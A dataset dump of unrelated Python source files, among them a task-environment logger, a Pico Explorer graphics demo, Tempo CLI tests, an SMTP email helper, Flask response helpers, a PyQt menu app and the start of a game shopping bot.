id
stringlengths 1
265
| text
stringlengths 6
5.19M
| dataset_id
stringclasses 7
values |
---|---|---|
1610080 | """Environment wrapper class for logging episodes.
This can be used to record data from a subject playing the task. See
../../moog_demos/restore_logged_data.py for an example of how to read log files.
Note: This logger records everything about the environment, which can be a lot
of data (depending on the task). If you plan to use this at scale for recording
subjects' or agents' behavior, we recommend forking this and modifying it to
only log the data that you need to do analyses for your specific task. For
example you may not want to log the positions/velocities of static sprites
(e.g. walls), or may not want to log all the attributes of sprites every
timestep (e.g. if you know that the colors of the sprites don't change in your
task).
"""
import copy
from datetime import datetime
import json
import logging
import numpy as np
import os
import time
from moog import env_wrappers
from moog import sprite
# This is the number of numerals in filenames. Since there is one file per
# episode, you should pick _FILENAME_ZFILL large enough that the number of
# episodes in your dataset is less than 10^_FILENAME_ZFILL.
_FILENAME_ZFILL = 5
class VertexLogging():
NEVER = 'NEVER'
ALWAYS = 'ALWAYS'
WHEN_NECESSARY = 'WHEN_NECESSARY'
def _serialize(x):
"""Serialize a value x.
This is used to serialize sprite attributes, actions, and meta_state so that
they are json-writable.
Specifically, numpy arrays are not JSON serializable, so we must convert
numpy arrays to lists. This function is recursive to handle nestings inside
of lists/tuples/dictionaries.
Args:
x: Value to serialize.
Returns:
Serialized value that can be JSON dumped.
"""
if isinstance(x, np.ndarray):
return x.tolist()
elif isinstance(x, (np.float32, np.float64)):
return float(x)
elif isinstance(x, (np.int32, np.int64)):
return int(x)
elif isinstance(x, list):
return [_serialize(a) for a in x]
elif isinstance(x, tuple):
return (_serialize(a) for a in x)
elif isinstance(x, dict):
return {k: _serialize(v) for k, v in x.items()}
else:
return x
class LoggingEnvironment(env_wrappers.AbstractEnvironmentWrapper):
"""Environment class for logging timesteps.
This logger produces a description of the log in 'description.txt' of
log_dir, so please refer to that for a detailed account of the structure of
the logs.
"""
def __init__(self, environment, log_dir='logs',
log_vertices='WHEN_NECESSARY'):
"""Constructor.
Args:
environment: Instance of ../moog/environment.Environment.
log_dir: String. Log directory relative to working directory.
log_vertices: String. Of the following options:
* 'NEVER'. In this case, never log sprite vertices.
* 'WHEN_NECESSARY'. In this case, log sprite vertices when a
sprite has either just appeared or just changed shape. In
this way, the vertices of a sprite can always be inferred
from the current position/angle/aspect_ratio and the
vertices that were logged for that sprite (identifiable by
its id) the last time its vertices were logged.
* 'ALWAYS'. Log vertices for all sprites every timestep.
"""
super(LoggingEnvironment, self).__init__(environment)
# Make sure log_vertices is a valid value
if not hasattr(VertexLogging, log_vertices):
raise ValueError('log_vertices is {} but must be in VertexLogging '
'values'.format(log_vertices))
self._log_vertices = log_vertices
# Set the logging directory
now_str = datetime.now().strftime("%Y_%m_%d_%H_%M_%S")
if log_dir[0] == '/':
log_dir = os.path.join(log_dir, now_str)
else:
log_dir = os.path.join(os.getcwd(), log_dir, now_str)
os.makedirs(log_dir)
self._log_dir = log_dir
# These are the attributes that we'll log
self._attributes = list(sprite.Sprite.FACTOR_NAMES) + ['id']
# Log attribute list
attributes_filename = os.path.join(self._log_dir, 'attributes.txt')
logging.info('Logging attribute list {} to {}.'.format(
self._attributes, attributes_filename))
with open(attributes_filename, 'w') as f:
json.dump(self._attributes, f)
# Log description
self._log_description()
# Initialize self._episode_log
self._episode_count = 0
self._episode_log = []
def _log_description(self):
"""Log a description of the data to a description.txt file."""
description_filename = os.path.join(self._log_dir, 'description.txt')
logging.info('Logging description to {}.'.format(description_filename))
description = (
'Each numerical file in this directory is an episode of the task. '
'Each such file contains a json-serialized list, each element of '
'which represents an environment step in the episode. Each step is '
'a list of four elements, [[`time`, time], [`reward`, reward], '
'[`step_type`, step_type], [`action`, action], [`meta_state`, '
'meta_state`], state].'
'\n\n'
'\n\n'
'time is a timestamp of the timestep.'
'\n\n'
'\n\n'
'reward contains the value of the reward at that step.'
'\n\n'
'\n\n'
'step_type indicates the dm_env.StepType of that step, i.e. '
'whether it was first, mid, or last.'
'\n\n'
'\n\n'
'action contains the agent action for the step.'
'\n\n'
'\n\n'
'meta_state is the serialized meta_state of the environment.'
'\n\n'
'\n\n'
'state is a list, each element of which represents a layer in the '
'environment state. The layer is represented as a list [k, [], [], '
'[], ...], where k is the layer name and the subsequent elements '
'are serialized sprites. Each serialized sprite is a list of '
'attributes. See attributes.txt for the attributes contained.'
)
if self._log_vertices == VertexLogging.ALWAYS:
description += (
' Furthermore, a list of vertices is appended to the attribute '
'list for each serialized sprite.'
)
elif self._log_vertices == VertexLogging.WHEN_NECESSARY:
description += (
'\n\n'
'\n\n'
'Furthermore, a list of vertices is appended to the attribute '
'list for a serialized for the first timestep in which that '
'serialized sprite appears, or when the sprite has changed '
'shape.'
)
with open(description_filename, 'w') as f:
f.write(description)
def _serialize_sprite(self, s):
"""Serialize a sprite as a list of attributes."""
attributes = [_serialize(getattr(s, x)) for x in self._attributes]
if (self._log_vertices == VertexLogging.ALWAYS or
(self._log_vertices == VertexLogging.WHEN_NECESSARY and
s.just_set_shape)):
attributes.append(s.vertices.tolist())
s.just_set_shape = False
return attributes
def _serialized_state(self):
"""Serialized a state."""
serialized_state = [
[k, [self._serialize_sprite(s) for s in self.state[k]]]
for k in self.state
]
return serialized_state
def step(self, action):
"""Step the environment with an action, logging timesteps."""
timestep = self._environment.step(action)
str_timestep = (
[['time', time.time()],
['reward', timestep.reward],
['step_type', timestep.step_type.value],
['action', _serialize(action)],
['meta_state', _serialize(self._environment.meta_state)],
self._serialized_state()]
)
self._episode_log.append(str_timestep)
if timestep.last():
# Write the episode to a log file
episode_count_str = str(self._episode_count).zfill(_FILENAME_ZFILL)
filename = os.path.join(self._log_dir, episode_count_str)
logging.info('Logging episode {} to {}.'.format(
self._episode_count, filename))
with open(filename, 'w') as f:
json.dump(self._episode_log, f)
self._episode_count += 1
self._episode_log = []
return timestep
| StarcoderdataPython |
93701 | import os
serenityff_C6 = os.path.dirname(__file__) + "/C6/"
serenityff_C12 = os.path.dirname(__file__) + "/C12/"
| StarcoderdataPython |
3256401 | <filename>src/pico_code/pico/explorer-base/ExplorerWorkout2.py
# Physical Computing with Graphics on Pico Explorer
# <NAME> 30th Jan 2021
# 10K Ohm potentiometer on ADC0
# LED with 470 Ohm resistor on GP4
import picoexplorer as display
import utime, random, math
from machine import Pin
width = display.get_width()
height = display.get_height()
display_buffer = bytearray(width * height * 2)
display.init(display_buffer)
led = Pin(4, Pin.IN,Pin.PULL_DOWN)
# Set the backlight to 30%
# display.set_backlight(0.3)
def blk():
display.set_pen(0,0,0)
display.clear()
display.update()
def title(msg,r,g,b):
blk()
display.set_pen(r,g,b)
display.text(msg, 20, 70, 200, 4)
display.update()
utime.sleep(2)
blk()
def horiz(l,t,r): # left, right, top
n = r-l+1 # Horizontal line
for i in range(n):
display.pixel(l + i, t)
def vert(l,t,b): # left, top, bottom
n = b-t+1 # Vertical line
for i in range(n):
display.pixel(l, t+i)
def box(l,t,r,b): # left, top, right, bottom
horiz(l,t,r) # Hollow rectangle
horiz(l,b,r)
vert(l,t,b)
vert(r,t,b)
def line(x,y,xx,yy): # (x,y) to (xx,yy)
if x > xx:
t = x # Swap co-ordinates if necessary
x = xx
xx = t
t = y
y = yy
yy = t
if xx-x == 0: # Avoid div by zero if vertical
vert(x,min(y,yy),max(y,yy))
else: # Draw line one dot at a time L to R
n=xx-x+1
grad = float((yy-y)/(xx-x)) # Calculate gradient
for i in range(n):
y3 = y + int(grad * i)
display.pixel(x+i,y3) # One dot at a time
def show(tt):
display.update()
utime.sleep(tt)
def align(n, max_chars):
# Aligns string of n in max_chars
msg1 = str(n)
space = max_chars - len(msg1)
msg2 = ""
for m in range(space):
msg2 = msg2 +" "
msg2 = msg2 + msg1
return msg2 # String - ready for display
def ring(cx,cy,rr): # Centre and radius
display.circle(cx,cy,rr)
display.set_pen(0,0,0) # background colour
display.circle(cx,cy,rr-1)
def ring2(cx,cy,r): # Centre (x,y), radius
for angle in range(0, 90, 2): # 0 to 90 degrees in 2s
y3=int(r*math.sin(math.radians(angle)))
x3=int(r*math.cos(math.radians(angle)))
display.pixel(cx-x3,cy+y3) # 4 quadrants
display.pixel(cx-x3,cy-y3)
display.pixel(cx+x3,cy+y3)
display.pixel(cx+x3,cy-y3)
def showgraph(v): # Bar graph
display.set_pen(255,0,0)
display.text("V", 8, 50, 240, 3)
display.set_pen(0,0,0) # Blank old bar graph
display.rectangle(29, 50, 220, 16)
display.set_pen(200,200,0) # New bar graph
display.rectangle(29, 50, v, 15)
display.set_pen(255,255,255) # Base line zero
vert(28, 46, 68)
display.set_pen(0,0,255) # percentage
display.text(str(align(v,4)) + " %", 140, 48, 240, 3)
# Define special 5x8 characters - 8 bytes each - 0...7
# Bytes top to bottom, 5 least significant bits only
smiley = [0x00,0x0A,0x00,0x04,0x11,0x0E,0x00,0x00]
sad = [0x00,0x0A,0x00,0x04,0x00,0x0E,0x11,0x00]
heart = [0,0,0,10,31,14,4,0]
b_heart = [0,10,31,0,0,14,4,0]
up_arrow =[0,4,14,21,4,4,0,0]
down_arrow = [0,4,4,21,14,4,0,0]
bits = [128,64,32,16,8,4,2,1] # Powers of 2
def mychar2(xpos, ypos, pattern): # Print defined character
for line in range(8): # 5x8 characters
for ii in range(5): # Low value bits only
i = ii + 3
dot = pattern[line] & bits[i] # Extract bit
if dot: # Only print WHITE dots
display.pixel(xpos+i*2, ypos+line*2)
display.pixel(xpos+i*2, ypos+line*2+1)
display.pixel(xpos+i*2+1, ypos+line*2)
display.pixel(xpos+i*2+1, ypos+line*2+1)
def mychar3(xpos, ypos, pattern): # Print defined character
for line in range(8): # 5x8 characters
for ii in range(5): # Low value bits only
i = ii + 3
dot = pattern[line] & bits[i] # Extract bit
if dot: # Only print WHITE dots
display.pixel(xpos+i*3, ypos+line*3)
display.pixel(xpos+i*3, ypos+line*3+1)
display.pixel(xpos+i*3, ypos+line*3+2)
display.pixel(xpos+i*3+1, ypos+line*3)
display.pixel(xpos+i*3+1, ypos+line*3+1)
display.pixel(xpos+i*3+1, ypos+line*3+2)
display.pixel(xpos+i*3+2, ypos+line*3)
display.pixel(xpos+i*3+2, ypos+line*3+1)
display.pixel(xpos+i*3+2, ypos+line*3+2)
# ==== Main ====
title("Pimoroni Pico Explorer Workout",200,200,0)
# === Basics ===
title("Basics",200,0,0)
display.set_pen(255,255,0)
line(10,10,100,100)
show(0.25)
display.set_pen(255,0,255)
line(10,100,100,10)
show(0.25)
display.set_pen(0,255,255)
box(0,105,100,205)
show(0.25)
display.set_pen(255,0,0)
ring(160,50,50)
show(0.25)
display.set_pen(0,0,255)
ring2(160,160,50)
show(0.25)
display.text("<NAME>", 15, 220, 240, 3)
display.update()
mychar2(20, 130, up_arrow) # Defined characters
mychar2(40, 130, smiley)
mychar2(60, 130, heart)
mychar2(20, 160, down_arrow)
mychar2(40, 160, sad)
mychar2(60, 160, b_heart)
mychar3(120, 130, up_arrow) # Bigger
mychar3(140, 130, smiley)
mychar3(160, 130, heart)
mychar3(120, 160, down_arrow)
mychar3(140, 160, sad)
mychar3(160, 160, b_heart)
show(3)
# Character Set - No lower case!
title("Character set",200,200,0)
display.set_pen(0,200,0)
display.text("Character Set", 15, 15, 200, 2)
s = ""
count = 0
for i in range(32,128,8):
for j in range(0,8,1):
p = i + j
if ((p < 97) or (p>122)):
s = s + chr(p)
count = count + 1
if (count)/16 == int((count)/16):
s = s +" " # 'space' for text wrap
print(s)
display.set_pen(200,200,0)
display.text(s, 15, 40, 200, 2)
display.set_pen(0,0,200)
display.text("No lower case", 140, 110, 200, 1)
display.set_pen(200,0,0)
display.text("Size 3", 15, 130, 200, 3)
display.set_pen(0,0,200)
display.text("Size 4", 15, 156, 200, 4)
display.set_pen(0,200,0)
display.text("Size 6", 15, 190, 200, 6)
display.update()
utime.sleep(5)
# Lines demo
title("lines",200,0,0)
for step in range(18, 2, -5):
blk()
display.set_pen(0,0,0)
display.clear()
red = random.randint(0, 255)
green = random.randint(0, 255)
blue =random.randint(0, 255)
display.set_pen(red, green, blue)
x = 0 # Block 1
y = 0
x2 = 239
for y2 in range(0,240, step):
line(x, y, x2, y2)
display.update()
x = 0 # Block 2
y = 239
x2 = 239
for y2 in range(239,-1,-step):
line(x, y, x2, y2)
display.update()
x = 239 # Block 3
y = 0
x2 = 0
for y2 in range(0,240, step):
line(x, y, x2, y2)
display.update()
x = 239 # Block 4
y = 239
x2 = 0
for y2 in range(239,-1,-step):
line(x, y, x2, y2)
display.update()
utime.sleep(0.5)
# === Sin & Cos graphs ====
title("Drawing graphs",0,200,0)
factor = 361 /240
#sine = []
display.set_pen(80,80,80)
horiz(0,60,239)
display.update()
display.set_pen(200,0,0)
for x in range(0,240):
y = int ((math.sin(math.radians(x * factor)))* -50) + 60
# sine.append(y)
display.pixel(x,y)
display.update()
display.text("Sine", 40, 70, 200, 2)
display.update()
display.set_pen(80,80,80)
horiz(0,180,239)
display.update()
display.set_pen(0,200,0)
for x in range(0,240):
y = int((math.cos(math.radians(x * factor)))* -50) + 180
display.pixel(x,y)
display.text("Cosine", 90, 160, 200, 2)
display.update()
utime.sleep(3)
title("Text on a path",0,0,200)
# Text on a downward slant
display.set_pen(255,0,0)
msg =" Pimoroni pico explorer"
b = bytes(msg, 'utf-8')
for i in range(len(b)):
c = b[i]
display.character(c, i*10,i*5 +110,2)
display.update()
# Text on a Sin wave
factor = 361 /240
display.set_pen(0,255,0)
for i in range(len(b)):
y = int ((math.sin(math.radians(i*10 * factor)))* -50) + 60
c = b[i]
display.character(c, i*10,y +10,2)
display.update()
utime.sleep(3)
title("Scrolling text on a Sine Curve",0,0,200)
# Scrolling on a Sine curve
# Modified from a method by <NAME> for a SSD1306
msg = 'Scrolling text on a sine curve using a pico explorer!'
f_width = 13 # Font width in pixels
f_height = 10 # Font Height in pixels
amp = 100 # Amplitude of sin wave
freq = 1 # Screen cycles (360 degrees)
pos = width # X position of the first character in the msg.
msg_len_px = len(msg) * f_width # Pixel width of the msg.
# Extra wide lookup table - calculate once to speed things up
y_table = [0] * (width+f_width) # 1 character extra
for i in range(len(y_table)):
p = i / (width-1) # Compute current position along
# lookup table in 0 to 1 range.
# Get y co-ordinate from table
y_table[i] = int(((amp/2.0) * math.sin(2.0*math.pi*freq*p)) + (amp/2.0))
# Scrolling loop:
blk()
running = True
while running:
# Clear scroll area
display.set_pen(0,0,0)
display.rectangle(0, 50, 240, 200)
display.set_pen(200,200,0)
# Start again if msg finished
pos -= 1
if pos <= -msg_len_px:
pos = width
# Go through each character in the msg.
for i in range(len(msg)):
char = msg[i]
char_x = pos + (i * f_width) # Character's X position on the screen.
if -f_width <= char_x < width:
# If haracter is visible, draw it.
display.text(char, char_x + 5, y_table[char_x+f_width]+60,2)
display.set_pen(100,100,100)
display.text("Press button Y to halt", 5, 215, 230, 2)
display.update()
if display.is_pressed(3): # Y button is pressed ?
running = False
utime.sleep(0.01)
blk()
# Physical Computing: Potentiometer, LED PWM and Bar Graph
potentiometer = machine.ADC(26) # 10K Ohm pot on ADC0
led = machine.PWM(machine.Pin(4)) # LED with 470 Ohm resistor on GP4
led.freq(1000)
led.duty_u16(0) # Switch LED OFF
title("Physical computing with graphics",0,0,200)
running = True
display.set_pen(255,255,255)
display.text("Turn Potentiometer", 20, 15, 230, 2)
display.set_pen(100,100,100)
display.text("Press button Y to halt", 5, 215, 230, 2)
display.set_pen(0,100,0)
box(60,80,180,200)
while running:
pot_raw = potentiometer.read_u16()
pot = pot_raw/256
# Adjust end values: 0 & 255
pot = int(pot * 256.0 /255.0) - 1
if pot > 255:
pot = 255
# print(pot) # Check pot's range is 0 -> 255 inclusive
percent = int(100 * pot / 255)
showgraph(percent)
display.update()
duty = pot_raw - 300 # duty must not go negative
if duty < 0 :
duty = 0
led.duty_u16(duty)
display.set_pen(pot,pot,pot) # grey to white
display.circle(120,140,50)
if display.is_pressed(3): # Y button is pressed ?
running = False
# Tidy up
led.duty_u16(0) # LED off
led = Pin(4, Pin.IN, Pin.PULL_DOWN) # Normal state
blk()
display.set_pen(200,0,0)
display.text("All Done!", 55, 140, 200, 3)
display.update()
utime.sleep(2)
blk()
| StarcoderdataPython |
40308 | import frappe
def after_migrate():
set_default_otp_template()
def set_default_otp_template():
if not frappe.db.get_value("System Settings", None, "email_otp_template"):
if frappe.db.exists("Email Template", "Default Email OTP Template"):
# should exists via fixtures
frappe.db.set_value("System Settings", None, "email_otp_template", "Default Email OTP Template")
if not frappe.db.get_value("System Settings", None, "sms_otp_template"):
if frappe.db.exists("SMS Template", "Default SMS OTP Template"):
# should exists via fixtures
frappe.db.set_value("System Settings", None, "sms_otp_template", "Default SMS OTP Template")
| StarcoderdataPython |
3353888 | <gh_stars>1-10
import copy
import pytest
from tempocli.cli import cli
from tempocli.cli import ENVVAR_PREFIX
from tests.helpers import write_yaml
def test_tempocli(cli_runner):
result = cli_runner.invoke(cli)
assert result.exit_code == 0
assert 'Usage:' in result.output
@pytest.mark.freeze_time('2018-08-05')
class TestTempoCliCreate(object):
data = {
'author_account_id': 'foo',
'issues': [
{
'issue': 'INT-8',
'time_spent': '30m',
'start_time': '09:30:00',
},
],
}
@pytest.fixture
def template_data(self):
return copy.deepcopy(self.data)
@pytest.fixture
def template(self, tmpdir):
return tmpdir.join('template.yml')
@pytest.fixture
def template_invoke(self, cli_invoke, config, template):
_args = [
'-vvv',
'--config',
config.strpath,
'create',
'--template',
template.strpath,
]
def func(args=None, **kwargs):
_args.extend(args or [])
return cli_invoke(cli, _args, **kwargs)
return func
def test_create_single(self, template, template_data, template_invoke, tempo_request):
write_yaml(template, template_data)
request = tempo_request.post('/worklogs')
result = template_invoke()
assert result.exit_code == 0
assert request.called_once
assert request.last_request.json() == {
'authorAccountId': 'foo',
'issueKey': self.data['issues'][0]['issue'],
'timeSpentSeconds': 1800,
'startDate': '2018-08-05',
'startTime': self.data['issues'][0]['start_time'],
'description': 'Working on issue {}'.format(self.data['issues'][0]['issue']),
}
def test_create_multiple(self, template, template_data, template_invoke, tempo_request):
template_data['issues'].append({
'issue': 'INT-10',
'time_spent': '30m',
'start_time': '09:30:00',
})
write_yaml(template, template_data)
request = tempo_request.post('/worklogs')
result = template_invoke()
assert result.exit_code == 0
assert request.call_count == 2
def test_create_author_override(self, template, template_data, template_invoke, tempo_request):
template_data['issues'][0]['author_account_id'] = 'bar'
write_yaml(template, template_data)
request = tempo_request.post('/worklogs')
result = template_invoke()
assert result.exit_code == 0
assert request.called_once
assert request.last_request.json()['authorAccountId'] == template_data['issues'][0]['author_account_id']
def test_create_extras_override(self, template, template_data, template_invoke, tempo_request):
template_data['issues'][0]['extras'] = {
'authorAccountId': 'bar',
}
write_yaml(template, template_data)
request = tempo_request.post('/worklogs')
result = template_invoke()
assert result.exit_code == 0
assert request.called_once
assert request.last_request.json()['authorAccountId'] == template_data['issues'][0]['extras']['authorAccountId']
def test_create_token_from_env(self, template, template_data, template_invoke, tempo_request):
token = '<PASSWORD>' # noqa: S105
write_yaml(template, template_data)
request = tempo_request.post('/worklogs')
result = template_invoke(
env={
'{}_TOKEN'.format(ENVVAR_PREFIX): token,
},
)
assert result.exit_code == 0
assert request.called_once
assert request.last_request.headers['Authorization'] == 'Bearer {}'.format(token)
def test_create_future_date(self, template, template_data, template_invoke, tempo_request):
template_data['issues'][0]['start_time'] = 'Monday at 11am'
write_yaml(template, template_data)
request = tempo_request.post('/worklogs')
result = template_invoke()
assert result.exit_code == 0
assert request.called_once
assert request.last_request.json()['startDate'] == '2018-08-06'
assert request.last_request.json()['startTime'] == '11:00:00'
def test_create_http_error(self, template, template_data, template_invoke, tempo_request):
write_yaml(template, template_data)
request = tempo_request.post('/worklogs', status_code=500)
result = template_invoke()
assert "Could not create ('foo', 'INT-8'," in result.output
assert 'Traceback' in result.output
assert result.exit_code == 1
assert request.called_once
| StarcoderdataPython |
15917 | from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from email.header import Header
from email.mime.base import MIMEBase
from email import encoders
import os
import uuid
import smtplib
import re
class CTEmail(object):
def __init__(self, usr, pwd, server='smtp.qq.com', port=25, hide=True):
self.user = usr
self.password = <PASSWORD>
self.server = server
self.port = port
self.hide = hide
self.pattern_img = r'(<EMAIL_IMG>.+</EMAIL_IMG>)'
def attach_image(self, img_dict):
"""
Attach image to use it in HTML mail body
:param img_dict:
:return: MIMEImage attachment
"""
with open(img_dict['path'], 'rb') as file:
msg_image = MIMEImage(file.read(), name=os.path.basename(img_dict['path']))
msg_image.add_header('Content-ID', '<{}>'.format(img_dict['cid']))
return msg_image
def attach_file(self, filename):
"""
Attach file to mail letter
:param filename: str
:return: MIMEBase attachment
"""
part = MIMEBase('application', 'octet-stream')
data = open(filename, 'rb').read()
part.set_payload(data)
encoders.encode_base64(part)
part.add_header('Content-Disposition', 'attachment; filename=%s' % os.path.basename(filename))
return part
def prepare_email(self, subject, recipients, content, images):
"""
Prepare mail body with attachments.
Basically this function form message.
:param subject: str
:param recipients: list
:param content: str
:param images: list
:return: message object
"""
msg = MIMEMultipart('related')
msg['Subject'] = Header(subject, 'utf-8')
msg['From'] = self.user
if self.hide:
msg['bcc'] = 'undisclosed-recipients'
else:
msg['to'] = ','.join(recipients)
msg_alternative = MIMEMultipart('alternative')
img_list = []
if images:
index = 0
for image in images:
image = dict(title='Image {0}'.format(index), path=image, cid=str(uuid.uuid4()))
img_html = '<div dir="ltr"><img src="cid:{cid}" ' \
'alt="Image should appear here...but this did not happened (" ' \
'style="display: block; color: #666666; ' \
'font-family: Helvetica, arial, sans-serif; font-size: 16px;" ' \
'class="img-max"></div>'.format(cid=image['cid'])
content = re.sub(self.pattern_img, img_html, content, 1)
img_list.append(image)
index += 1
msg_html = MIMEText(content, 'html', 'utf-8')
msg_alternative.attach(msg_html)
msg.attach(msg_alternative)
# the sequence of images attachment matters, so need twice check
if img_list:
for img in img_list:
msg.attach(self.attach_image(img))
return msg
def send_email(self, subject, content_path, recipients):
"""
This function send email to the list of recipients.
Images are automatically added if content_path is directory
(assumed that this directory contains html+images)
:param subject: str
:param content_path: str
:param recipients: list
:return: None
"""
if os.path.exists(content_path):
if os.path.isdir(content_path):
files = sorted(os.listdir(content_path))
images = []
for file in files:
path = os.path.join(content_path, file)
if file.endswith('.html'):
content = open(path, 'r').read()
elif file.endswith('.jpg') or file.endswith('.jpeg') or file.endswith('.png'):
images.append(path)
elif os.path.isfile(content_path):
content = open(content_path, 'r', encoding='utf-8').read()
msg = self.prepare_email(subject, recipients, content, images)
mailServer = smtplib.SMTP(self.server, self.port)
mailServer.ehlo()
mailServer.starttls()
mailServer.ehlo()
mailServer.login(self.user, self.password)
mailServer.sendmail(self.user, recipients, msg.as_string())
mailServer.quit() | StarcoderdataPython |
112306 | <filename>common/responses.py<gh_stars>0
from flask import jsonify
import common.logger as log
def respondInternalServerError(message='Internal server error', error=None):
'''Returns an object which flask will parse and transform into a 500 response'''
log.info('Responding internal server error')
log.info('*'.center(20, '-'))
if error is not None:
print(error)
return (jsonify({
'code': 500,
'message': message
}), 500)
def respondBadRequest(message='Invalid data sent'):
'''Returns an object which flask will parse and transform into a 400 response'''
log.info('Responding bad request')
log.info('*'.center(20, '-'))
return (jsonify({
'code': 400,
'message': message
}), 400)
def respondUnauthorized(message):
'''Returns an object which flask will parse and transform into a 401 response'''
log.info('Responding unauthorized')
log.info('*'.center(20, '-'))
return (jsonify({
'code': 401,
'message': message
}), 401)
def respondCreated(data):
'''Returns an object which flask will parse and transform into a 201 response'''
log.info('Responding created')
log.info('*'.center(20, '-'))
return (jsonify(data), 201)
def respondOk(data):
'''Returns an object which flask will parse and transform into a 200 response'''
log.info('Responding OK')
log.info('*'.center(20, '-'))
return (jsonify({
'code': 200,
'message': data
}), 200)
def respondWithData(data):
'''Returns an object which flask will parse and transform into a 200 response
. This response json will be of the form
{
'code': 200,
'key_1': 'value_1',
'key_n': 'value_n'
}
'''
log.info('Responding with data')
log.info('*'.center(20, '-'))
t = {'code': 200}
data = {**t, **data}
return (jsonify(data), 200)
| StarcoderdataPython |
3293004 | <reponame>Juan-Manuel-Diaz/UniNeuroLab<filename>GUI/Menu_principal.py
#!/usr/bin/env python
# coding: utf-8
# In[1]:
from PyQt5.QtWidgets import (QApplication, QMainWindow, QVBoxLayout, QMenu,
QLabel, QLineEdit, QPushButton, QWidget, QAction)
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QFont
import sys
import Interfaz_trazo_A
import Interfaz_trazo_B
class Login(QMainWindow):
def __init__(self):
super().__init__()
self.setWindowTitle("Login de credenciales")
self.credenciales()
def credenciales(self):
centralwidget = QWidget()
self.setCentralWidget(centralwidget)
layout = QVBoxLayout(centralwidget)
Bienvenida_lbl = QLabel("Bienvenidos a UniNeuroLab.\n \
Favor de iniciar sesión para poder guardar sus estudios correctamente")
Bienvenida_lbl.setAlignment(Qt.AlignCenter)
user_input1 = QLineEdit()
user_input1.setPlaceholderText("Nombre")
user_input1.setClearButtonEnabled(True)
user_input2 = QLineEdit()
user_input2.setPlaceholderText("Apellido")
user_input2.setClearButtonEnabled(True)
user_input3 = QLineEdit()
user_input3.setPlaceholderText("DNI")
user_input3.setClearButtonEnabled(True)
btn1 = QPushButton("Iniciar sesión")
btn1.clicked.connect(lambda: self.user(
user_input1.text(), user_input2.text()))
btn2 = QPushButton("Entrar como anónimo")
btn2.clicked.connect(self.Anon_User)
layout.addWidget(Bienvenida_lbl)
layout.addWidget(user_input1)
layout.addWidget(user_input2)
layout.addWidget(user_input3)
layout.addWidget(btn1)
layout.addWidget(btn2)
self.setLayout(layout)
self.show()
def Anon_User(self):
self.main_menu = MainMenu()
self.main_menu.show()
self.close()
def user(self, nombre, apellido):
self.name = "{}, {}".format(apellido, nombre)
self.main_menu = MainMenu(self.name)
self.main_menu.show()
self.close()
class MainMenu(QMainWindow):
def __init__(self, name=None):
super().__init__()
self.setWindowTitle("UniNeuroLab - Menú Principal")
self.setGeometry(100, 100, 800, 600)
if name is None:
self.name = "Anónimo/a"
else:
self.name = name
self.UI()
def UI(self):
centralwidget = QWidget()
self.setCentralWidget(centralwidget)
layout = QVBoxLayout(centralwidget)
lbl1 = QLabel(
"Bienvenido a UniNeuroLab {}.\n Disfrute su visita".format(self.name))
lbl1.setFont(QFont('Arial', 25))
lbl1.setAlignment(Qt.AlignCenter)
test_trazo = QMenu("&Test del trazo", self)
test_trazo.setStatusTip('Test del trazo que consiste en')
test_trazo_a = QAction('Test del trazo &A', self)
test_trazo_b = QAction('Test del trazo &B', self)
test_trazo_a.triggered.connect(lambda: self.interfaz_trazo_a(self.name))
test_trazo_b.triggered.connect(lambda: self.interfaz_trazo_b(self.name))
test_trazo.addAction(test_trazo_a)
test_trazo.addAction(test_trazo_b)
menubar = self.menuBar()
testMenu = menubar.addMenu('&Tests')
testMenu.addMenu(test_trazo)
layout.addWidget(lbl1)
self.setLayout(layout)
def interfaz_trazo_a(self, name=None):
test = Interfaz_trazo_A.MyWindow()
test.show()
def interfaz_trazo_b(self, name=None):
test = Interfaz_trazo_B.MyWindow()
test.show()
if (__name__ == '__main__'):
app = QApplication(sys.argv)
win0 = Login() # Se establece una ventana principal
win0.show()
sys.exit(app.exec())
| StarcoderdataPython |
3380316 | from controller.acoController import AcoController
def main():
controller = AcoController()
controller.solve()
return
if __name__ == '__main__':
try:
print('\n\t-- ACO Router --\n')
main()
print('\n----------------------------------\n')
except Exception as err:
print('- Runtime error: ', err)
| StarcoderdataPython |
3204953 | from shop.shopper_base import ShopperBase
import datetime
import os
import time
import math
import random
from typing import Dict, Tuple, Union, List, Callable
import keyboard
import numpy as np
from screen import convert_screen_to_monitor, grab, convert_abs_to_monitor, convert_screen_to_abs, convert_monitor_to_screen
from config import Config
from logger import Logger
from npc_manager import Npc, open_npc_menu, press_npc_btn
from template_finder import TemplateFinder
from utils.custom_mouse import mouse
from utils.misc import wait
def exit(run_obj):
run_time = str(datetime.timedelta(seconds=round(time.time() - run_obj.start_time)))
Logger.info("Exiting shopping mall...")
print(
"STATS \truns \t\ttime \titems_evaluated \titems_bought\n"
f"\t{run_obj.run_count} \t\t{run_time}"
f"\t\t{run_obj.items_evaluated} \t\t\t{run_obj.items_bought}"
)
os._exit(0)
class DrognanShopper(ShopperBase):
"""
Shop at Drognan for Items.
Currently supported: Hammerdin scepters
In order to start the shopping bot:
1.) Run this this file in Python.
2.) Be ingame in Lut Golein (Act 2 town)
3.) Stand close to Drognan and the town exit (must be top right layout)
4.) While being ingame, press resume_key (default F11) to start the shopping, and exit_key (default F12) to stop it.
"""
def __init__(self):
# Set look_for variables to False if you dont like your personal shopper to look for these
# Obviously something need to be set to True, or your shopper will be very confused
self.look_for_scepters = Config().shop["shop_hammerdin_scepters"]
self.speed_factor = 1.0 + Config().shop["speed_factor"]
if (self.speed_factor <= 0):
Logger.error("Can not use a speed factor less than negative 1!! Please update shop.ini. Exiting.")
os._exit(0)
self.apply_pather_adjustment = Config().shop["apply_pather_adjustment"]
self.run_count = 0
self.start_time = time.time()
# items config
self.roi_shop_item_stats = [0, 0, Config().ui_pos["screen_width"] // 2, Config().ui_pos["screen_height"] - 100]
self.roi_vendor = Config().ui_roi["left_inventory"]
self.rx, self.ry, _, _ = self.roi_vendor
self.sb_x, self.sb_y = convert_screen_to_monitor((180, 77))
self.c_x, self.c_y = convert_screen_to_monitor((Config().ui_pos["center_x"], Config().ui_pos["center_y"]))
self.items_evaluated = 0
self.items_bought = 0
self.look_for_leaf_runeword_base = Config().shop["shop_leaf_runeword_base"]
self.look_for_wand_of_life_tap = Config().shop["shop_weapon_life_tap"]
self.look_for_wand_of_lower_resist = Config().shop["shop_weapon_lower_resist"]
super(DrognanShopper, self).__init__()
self.get_tabs()
def get_name(self):
return "Drognan"
